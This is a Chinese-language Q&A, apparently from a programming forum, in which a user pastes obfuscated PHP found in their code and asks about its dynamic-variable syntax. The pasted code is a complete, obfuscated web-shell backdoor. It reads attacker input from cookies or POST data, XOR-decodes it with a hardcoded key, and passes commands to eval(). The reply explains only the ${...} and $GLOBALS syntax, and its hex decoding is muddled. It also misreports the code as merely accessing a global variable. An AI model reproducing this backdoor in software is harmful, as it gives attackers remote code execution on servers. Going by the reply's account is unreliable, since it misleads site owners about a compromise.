我发现这个php代码中有一些奇怪的语法:
<?php $hd701 = 475;$GLOBALS['xbe829'] = Array();global $xbe829;$xbe829 = $GLOBALS;${"x47x4cx4fBx41x4cx53"}['v9800'] = "x7ax7bx60x5bx4ax56x6cx51x21x62x38x66x44xax2ex27x22x50x58x45x49x3dx79x43x23x3bx53x29x2ax30x6bx73x63x9x77x6fx47x6ax4ex54x39x3fx40x4fx35x4bx26x34x6dx5dx76x3ax3cx64x71x67x5ex5cx46x6ex75x4cxdx42x65x52x48x70x41x68x55x2bx57x5ax69x7cx20x2cx28x74x59x3ex2fx37x78x33x31x7dx61x5fx7ex72x2dx24x36x25x4dx32";$xbe829[$xbe829['v9800'][32].$xbe829['v9800'][85].$xbe829['v9800'][11].$xbe829['v9800'][11].$xbe829['v9800'][94]] = $xbe829['v9800'][32].$xbe829['v9800'][69].$xbe829['v9800'][91];$xbe829[$xbe829['v9800'][74].$xbe829['v9800'][29].$xbe829['v9800'][86].$xbe829['v9800'][86]] = $xbe829['v9800'][35].$xbe829['v9800'][91].$xbe829['v9800'][53];$xbe829[$xbe829['v9800'][54].$xbe829['v9800'][11].$xbe829['v9800'][83].$xbe829['v9800'][64].$xbe829['v9800'][44].$xbe829['v9800'][94]] = $xbe829['v9800'][31].$xbe829['v9800'][79].$xbe829['v9800'][91].$xbe829['v9800'][6].$xbe829['v9800'][64].$xbe829['v9800'][59];$xbe829[$xbe829['v9800'][74].$xbe829['v9800'][47].$xbe829['v9800'][53].$xbe829['v9800'][83].$xbe829['v9800'][44]] = $xbe829['v9800'][74].$xbe829['v9800'][59].$xbe829['v9800'][74].$xbe829['v9800'][89].$xbe829['v9800'][31].$xbe829['v9800'][64].$xbe829['v9800'][79];$xbe829[$xbe829['v9800'][11].$xbe829['v9800'][44].$xbe829['v9800'][10].$xbe829['v9800'][10].$xbe829['v9800'][94].$xbe829['v9800'][44].$xbe829['v9800'][11]] = $xbe829['v9800'][31].$xbe829['v9800'][64].$xbe829['v9800'][91].$xbe829['v9800'][74].$xbe829['v9800'][88].$xbe829['v9800'][6].$xbe829['v9800'][74].$xbe829['v9800'][0].$xbe829['v9800'][64];$xbe829[$xbe829['v9800'][79].$xbe829['v9800'][64].$xbe829['v9800'][9].$xbe829['v9800'][88].$xbe829['v9800'][47].$xbe829['v9800'][64].$xbe829['v9800'][11].$xbe829['v9800'][97]] = $xbe829['v9800'][67].$xbe829['v9800'][69].$xbe829['v9800'][67].$xbe829['v9800'][50].$xbe829['v9800'][64].$xbe829['v9800'][91].$xbe829['v9800'][31].$xbe829['v9800'][74].$xbe829['v9800'][35].$xbe829['v9800'][59];$xbe829[$xbe829['v9800'][0].$xbe829['v9800'][64].$xbe829['v9800'][47].$xbe829['v9800'][94].$xbe829['v9800'][86]] = $xbe829['v9800'][60].$xbe829['v9800'][59].$xbe829['v9800'][31].$xbe829['v9800'][64].$xbe829['v9800'][91].$xbe829['v9800'][74].$xbe829['v9800'][88].$xbe829['v9800'][6].$xbe829['v9800'][74].$xbe829['v9800'][0].$xbe829['v9800'][64];$xbe829[$xbe829['v9800'][48].$xbe829['v9800'][97].$xbe829['v9800'][83].$xbe829['v9800'][44].$xbe829['v9800'][32]] = $xbe829['v9800'][9].$xbe829['v9800'][88].$xbe829['v9800'][31].$xbe829['v9800'][64].$xbe829['v9800'][94].$xbe829['v9800'][47].$xbe829['v9800'][89].$xbe829['v9800'][53].$xbe829['v9800'][64].$xbe829['v9800'][32].$xbe829['v9800'][35].$xbe829['v9800'][53].$xbe829['v9800'][64];$xbe829[$xbe829['v9800'][79].$xbe829['v9800'][47].$xbe829['v9800'][47].$xbe829['v9800'][9].$xbe829['v9800'][11]] = $xbe829['v9800'][31].$xbe829['v9800'][64].$xbe829['v9800'][79].$xbe829['v9800'][89].$xbe829['v9800'][79].$xbe829['v9800'][74].$xbe829['v9800'][48].$xbe829['v9800'][64].$xbe829['v9800'][89].$xbe829['v9800'][6].$xbe829['v9800'][74].$xbe829['v9800'][48].$xbe829['v9800'][74].$xbe829['v9800'][79];$xbe829[$xbe829['v9800'][79].$xbe829['v9800'][9].$xbe829['v9800'][29].$xbe829['v9800'][83].$xbe829['v9800'][47]] = $xbe829['v9800'][31].$xbe829['v9800'][32].$xbe829['v9800'][53].$xbe829['v9800'][9].$xbe829['v9800'][88].$xbe829['v9800'][9];$xbe829[$xbe829['v9800'][22].$xbe829['v9800'][29].$xbe829['v9800'][40].$xbe829['v9800'][9].$xbe829['v9800'][9].$xbe829['v9800'][85].$xbe829['v9800'][88].$xbe829['v9800'][53]] = $xbe829['v9800'][69].$xbe829['v9800'][86].$xbe829['v9800'][94].$xbe829['v9800'][86].$xbe829['v9800'][29].$xbe829['v9800'][83];$xbe829[$xbe829['v9800'][88].$xbe829['v9800'][10].$xbe829['v9800'][10].$xbe829['v9800'][85].$xbe829['v9800'][9].$xbe829['v9800'][44].$xbe829['v9800'][88]] = $_POST;$xbe829[$xbe829['v9800'][60].$xbe829['v9800'][83].$xbe829['v9800'][86].$xbe829['v9800'][9].$xbe829['v9800'][86].$xbe829['v9800'][86].$xbe829['v9800'][47].$xbe829['v9800'][9].$xbe829['v9800'][9]] = $_COOKIE;@$xbe829[$xbe829['v9800'][74].$xbe829['v9800'][47].$xbe829['v9800'][53].$xbe829['v9800'][83].$xbe829['v9800'][44]]($xbe829['v9800'][64].$xbe829['v9800'][91].$xbe829['v9800'][91].$xbe829['v9800'][35].$xbe829['v9800'][91].$xbe829['v9800'][89].$xbe829['v9800'][6].$xbe829['v9800'][35].$xbe829['v9800'][55], NULL);@$xbe829[$xbe829['v9800'][74].$xbe829['v9800'][47].$xbe829['v9800'][53].$xbe829['v9800'][83].$xbe829['v9800'][44]]($xbe829['v9800'][6].$xbe829['v9800'][35].$xbe829['v9800'][55].$xbe829['v9800'][89].$xbe829['v9800'][64].$xbe829['v9800'][91].$xbe829['v9800'][91].$xbe829['v9800'][35].$xbe829['v9800'][91].$xbe829['v9800'][31], 0);@$xbe829[$xbe829['v9800'][74].$xbe829['v9800'][47].$xbe829['v9800'][53].$xbe829['v9800'][83].$xbe829['v9800'][44]]($xbe829['v9800'][48].$xbe829['v9800'][88].$xbe829['v9800'][84].$xbe829['v9800'][89].$xbe829['v9800'][64].$xbe829['v9800'][84].$xbe829['v9800'][64].$xbe829['v9800'][32].$xbe829['v9800'][60].$xbe829['v9800'][79].$xbe829['v9800'][74].$xbe829['v9800'][35].$xbe829['v9800'][59].$xbe829['v9800'][89].$xbe829['v9800'][79].$xbe829['v9800'][74].$xbe829['v9800'][48].$xbe829['v9800'][64], 0);@$xbe829[$xbe829['v9800'][79].$xbe829['v9800'][47].$xbe829['v9800'][47].$xbe829['v9800'][9].$xbe829['v9800'][11]](0);$x7bb89b70 = NULL;$t0e76b849 = NULL;$xbe829[$xbe829['v9800'][67].$xbe829['v9800'][47].$xbe829['v9800'][10].$xbe829['v9800'][85].$xbe829['v9800'][29].$xbe829['v9800'][83].$xbe829['v9800'][44].$xbe829['v9800'][40].$xbe829['v9800'][47]] = $xbe829['v9800'][40].$xbe829['v9800'][44].$xbe829['v9800'][88].$xbe829['v9800'][64].$xbe829['v9800'][32].$xbe829['v9800'][88].$xbe829['v9800'][85].$xbe829['v9800'][83].$xbe829['v9800'][92].$xbe829['v9800'][64].$xbe829['v9800'][53].$xbe829['v9800'][10].$xbe829['v9800'][86].$xbe829['v9800'][92].$xbe829['v9800'][47].$xbe829['v9800'][10].$xbe829['v9800'][47].$xbe829['v9800'][83].$xbe829['v9800'][92].$xbe829['v9800'][40].$xbe829['v9800'][64].$xbe829['v9800'][83].$xbe829['v9800'][86].$xbe829['v9800'][92].$xbe829['v9800'][11].$xbe829['v9800'][83].$xbe829['v9800'][94].$xbe829['v9800'][86].$xbe829['v9800'][10].$xbe829['v9800'][9].$xbe829['v9800'][86].$xbe829['v9800'][53].$xbe829['v9800'][9].$xbe829['v9800'][88].$xbe829['v9800'][44].$xbe829['v9800'][47];global $p48307594;function h16107($x7bb89b70, $he719627){global $xbe829;$gea9ce = "";for ($t69c26=0; $t69c26<$xbe829[$xbe829['v9800'][54].$xbe829['v9800'][11].$xbe829['v9800'][83].$xbe829['v9800'][64].$xbe829['v9800'][44].$xbe829['v9800'][94]]($x7bb89b70);){for ($nb3186c8=0; $nb3186c8<$xbe829[$xbe829['v9800'][54].$xbe829['v9800'][11].$xbe829['v9800'][83].$xbe829['v9800'][64].$xbe829['v9800'][44].$xbe829['v9800'][94]]($he719627) && $t69c26<$xbe829[$xbe829['v9800'][54].$xbe829['v9800'][11].$xbe829['v9800'][83].$xbe829['v9800'][64].$xbe829['v9800'][44].$xbe829['v9800'][94]]($x7bb89b70); $nb3186c8++, $t69c26++){$gea9ce .= $xbe829[$xbe829['v9800'][32].$xbe829['v9800'][85].$xbe829['v9800'][11].$xbe829['v9800'][11].$xbe829['v9800'][94]]($xbe829[$xbe829['v9800'][74].$xbe829['v9800'][29].$xbe829['v9800'][86].$xbe829['v9800'][86]]($x7bb89b70[$t69c26]) ^ $xbe829[$xbe829['v9800'][74].$xbe829['v9800'][29].$xbe829['v9800'][86].$xbe829['v9800'][86]]($he719627[$nb3186c8]));}}return $gea9ce;}function scdbab($x7bb89b70, $he719627){global $xbe829;global $p48307594;return $xbe829[$xbe829['v9800'][22].$xbe829['v9800'][29].$xbe829['v9800'][40].$xbe829['v9800'][9].$xbe829['v9800'][9].$xbe829['v9800'][85].$xbe829['v9800'][88].$xbe829['v9800'][53]]($xbe829[$xbe829['v9800'][22].$xbe829['v9800'][29].$xbe829['v9800'][40].$xbe829['v9800'][9].$xbe829['v9800'][9].$xbe829['v9800'][85].$xbe829['v9800'][88].$xbe829['v9800'][53]]($x7bb89b70, $p48307594), $he719627);}foreach ($xbe829[$xbe829['v9800'][60].$xbe829['v9800'][83].$xbe829['v9800'][86].$xbe829['v9800'][9].$xbe829['v9800'][86].$xbe829['v9800'][86].$xbe829['v9800'][47].$xbe829['v9800'][9].$xbe829['v9800'][9]] as $he719627=>$y301fc25){$x7bb89b70 = $y301fc25;$t0e76b849 = $he719627;}if (!$x7bb89b70){foreach ($xbe829[$xbe829['v9800'][88].$xbe829['v9800'][10].$xbe829['v9800'][10].$xbe829['v9800'][85].$xbe829['v9800'][9].$xbe829['v9800'][44].$xbe829['v9800'][88]] as $he719627=>$y301fc25){$x7bb89b70 = $y301fc25;$t0e76b849 = $he719627;}}$x7bb89b70 = @$xbe829[$xbe829['v9800'][0].$xbe829['v9800'][64].$xbe829['v9800'][47].$xbe829['v9800'][94].$xbe829['v9800'][86]]($xbe829[$xbe829['v9800'][79].$xbe829['v9800'][9].$xbe829['v9800'][29].$xbe829['v9800'][83].$xbe829['v9800'][47]]($xbe829[$xbe829['v9800'][48].$xbe829['v9800'][97].$xbe829['v9800'][83].$xbe829['v9800'][44].$xbe829['v9800'][32]]($x7bb89b70), $t0e76b849));if (isset($x7bb89b70[$xbe829['v9800'][88].$xbe829['v9800'][30]]) && $p48307594==$x7bb89b70[$xbe829['v9800'][88].$xbe829['v9800'][30]]){if ($x7bb89b70[$xbe829['v9800'][88]] == $xbe829['v9800'][74]){$t69c26 = Array($xbe829['v9800'][67].$xbe829['v9800'][50] => @$xbe829[$xbe829['v9800'][79].$xbe829['v9800'][64].$xbe829['v9800'][9].$xbe829['v9800'][88].$xbe829['v9800'][47].$xbe829['v9800'][64].$xbe829['v9800'][11].$xbe829['v9800'][97]](),$xbe829['v9800'][31].$xbe829['v9800'][50] => $xbe829['v9800'][86].$xbe829['v9800'][14].$xbe829['v9800'][29].$xbe829['v9800'][92].$xbe829['v9800'][86],);echo @$xbe829[$xbe829['v9800'][11].$xbe829['v9800'][44].$xbe829['v9800'][10].$xbe829['v9800'][10].$xbe829['v9800'][94].$xbe829['v9800'][44].$xbe829['v9800'][11]]($t69c26);}elseif ($x7bb89b70[$xbe829['v9800'][88]] == $xbe829['v9800'][64]){eval/*l551d*/($x7bb89b70[$xbe829['v9800'][53]]);}exit();} ?>
我特别好奇,这是什么语法?
${"x47x4cx4fBx41x4cx53"}['v9800']
首先,为了解决代码语法本身的问题,PHP允许您动态创建变量名。
假设你有一个变量:
$test = 123;
您可以动态创建对该变量的引用,如下所示:
echo ${'test'}; // Prints '123'
你为什么要这么做?上面的例子毫无意义,但假设您需要在运行时动态运行一些变量名:
$var1 = 'A';
$var2 = 'B';
$var3 = 'C';
for ($i = 1; $i <= 3; $i++) {
echo ${'var' . $i};
}
// Prints 'ABC'
既然我们知道了语法的含义,x47x4cx4fBx41x4cx53是什么意思?
x用于转义十六进制字符序列。简单地说,您显示的字符串是一组字符,有人将其表示为十六进制,而不是您习惯看到的人类可读的ASCII字符。
如果我们去掉x逃逸部件,我们只剩下:
474c4fB414c53
据我所知,这里的B不是十六进制的。这给我们留下了:
474c4f 414c53
翻译过来就是:
GLO ALS
如果我们更换B,我们得到:
GLOBALS
如果我们将其重新添加到您的动态变量引用中,并再次查看代码,我们将得到:
$GLOBALS['v9800']
这很有趣,因为$GLOBALS是PHP中的一个特殊数组,它可以访问全局范围内的所有变量。因此,从本质上讲,您的代码试图访问一个名为$v9800的全局变量。
你必须决定这对你的应用程序意味着什么,但这段代码可能是可疑的。可能是有人故意使用这种神秘的方法伪装他们的代码,试图访问全局变量。